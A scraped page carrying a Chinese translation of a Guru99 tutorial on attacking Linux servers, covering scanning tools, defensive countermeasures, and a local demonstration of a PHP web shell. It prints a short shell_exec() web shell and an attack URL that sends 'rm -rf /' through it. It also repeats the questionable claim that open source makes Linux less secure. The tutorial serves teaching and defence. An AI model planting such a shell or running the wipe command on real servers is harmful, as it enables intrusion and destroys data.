<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                合規國際互聯網加速 OSASE為企業客戶提供高速穩定SD-WAN國際加速解決方案。 廣告
                # 黑客 Linux 操作系統:完整的 Ubuntu 示例教程 > 原文: [https://www.guru99.com/hacking-linux-systems.html](https://www.guru99.com/hacking-linux-systems.html) Linux 是使用最廣泛的服務器操作系統,尤其是對于 Web 服務器。 它是開源的; 這意味著任何人都可以訪問源代碼。 **與其他操作系統相比,它的安全性較低,因為攻擊者可以研究源代碼來查找漏洞**。 [Linux](/unix-linux-tutorial.html) 黑客活動是利用這些漏洞來獲得對系統的未經授權的訪問。 在本文中,我們將向您介紹 Linux 是什么,Linux 的安全漏洞以及可以采取的對策。 ## 本教程涵蓋的主題 * [關于 Linux](#1) 的快速說明 * [Linux 黑客工具](#2) * [如何防止 Linux 駭客](#3) * [黑客活動:使用 PHP 入侵 Linux 系統](#4) ## 在 Linux 上的快速說明 **Linux 是開源操作系統**。 有許多基于 Linux 的操作系統發行版,例如 Redhat,Fedora 和 Ubuntu 等。與其他操作系統不同,Linux 在安全性方面不太安全。 這是因為源代碼是免費提供的,因此與非開放源代碼的其他操作系統相比,很容易研究它的漏洞并加以利用。 Linux 可以用作服務器,臺式機,平板電腦或移動設備操作系統。 可以使用 GUI 或命令來操作 Linux 程序。 與使用 GUI 相比,這些命令更加有效。 因此,有助于了解 Linux 基本命令。 有關如何開始使用 Linux 的信息,請參考這些教程 [https://www.guru99.com/unix-linux-tutorial.html](/unix-linux-tutorial.html) 。 ## Linux 黑客工具 * **Nessus** –該工具可用于掃描配置設置,補丁和網絡等。可以在 [https://www.tenable.com/products/nessus](https://www.tenable.com/products/nessus) 中找到它。 * **NMap。** 此工具可用于監視服務器上正在運行的主機及其使用的服務。 它也可以用于掃描端口。 可以在 [https://nmap.org/](https://nmap.org/) 中找到 * **SARA –** SARA 是 Security Auditor 研究助理的縮寫。 顧名思義,此工具可用于針對諸如 [SQL](/sql.html) 注入,XSS 等威脅來審核網絡。可以在 [http://www-arc.com/sara/sara 上找到該工具。 .html](http://www-arc.com/sara/sara.html) 上面的列表并不詳盡; 它使您了解可用于入侵 Linux 系統的工具。 ## 如何防止 Linux 黑客入侵 Linux Hacking 利用了操作系統中的漏洞。 組織可以采用以下策略來保護自己免受此類攻擊。 * **修補程序管理** –修補程序修復了攻擊者用來破壞系統的錯誤。 良好的補丁程序管理策略將確保您不斷將相關補丁程序應用到系統中。 * **正確的操作系統配置** –其他漏洞利用服務器配置中的弱點。 不活動的用戶名和守護程序應被禁用。 應更改默認設置,例如應用程序的通用密碼,默認用戶名和某些端口號。 * **入侵檢測系統** –此類工具可用于檢測對系統的未授權訪問。 一些工具具有檢測和阻止此類攻擊的能力。 ## 黑客活動:使用 PHP 入侵 Ubuntu Linux 系統 在這種實際情況下,我們將為您提供有關如何使用 [PHP](/php-tutorials.html) 危害 Linux 的基本信息。 我們不會針對任何受害者。 如果要嘗試,可以在本地計算機上安裝 LAMPP。 PHP 帶有兩個可用于執行 Linux 命令的函數。 它具有 exec()和 shell_exec()函數。 函數 exec()返回命令輸出的最后一行,而 shell_exec()以字符串形式返回命令的整個結果。 為了演示起見,假設攻擊者管理者將以下文件上傳到網絡服務器上。 ``` <?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?> ``` **此處,** 上面的腳本從名為 cmd 的 GET 變量獲取命令。 使用 shell_exec()執行命令,結果在瀏覽器中返回。 可以使用以下 URL 來利用以上代碼 http://localhost/cp/konsole.php?cmd = ls%20-l **HERE,** * “…konsole.php?cmd = ls%20-l” **將值 ls –l 分配給變量 cmd** 。 針對服務器執行的命令將是 ``` shell_exec('ls -l') ; ``` 在 Web 服務器上執行上述代碼可獲得與以下類似的結果。 ![Hacking Linux Systems](https://img.kancloud.cn/25/83/2583a121ea0ee7927d47a929e4b91184_563x345.png "Hacking Linux Systems") 上面的命令僅顯示當前目錄中的文件和權限 假設攻擊者傳遞了以下命令 ``` rm -rf / ``` **HERE,** * “ rm”刪除文件 * “ rf”使 rm 命令以遞歸模式運行。 刪除所有文件夾和文件 * “ /”指示命令開始從根目錄刪除文件 攻擊網址看起來像這樣 http://localhost/cp/konsole.php?cmd = rm%20-rf%20 / ## 摘要 * Linux 是用于服務器,臺式機,平板電腦和移動設備的流行操作系統。 * Linux 是開源的,任何人都可以獲取源代碼。 這樣可以輕松發現漏洞。 * 基本命令和網絡命令對 Linux 黑客來說非常重要。 * 漏洞是可以利用來破壞系統的漏洞。 * 良好的安全性可以幫助保護系統免受攻擊者的破壞。
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看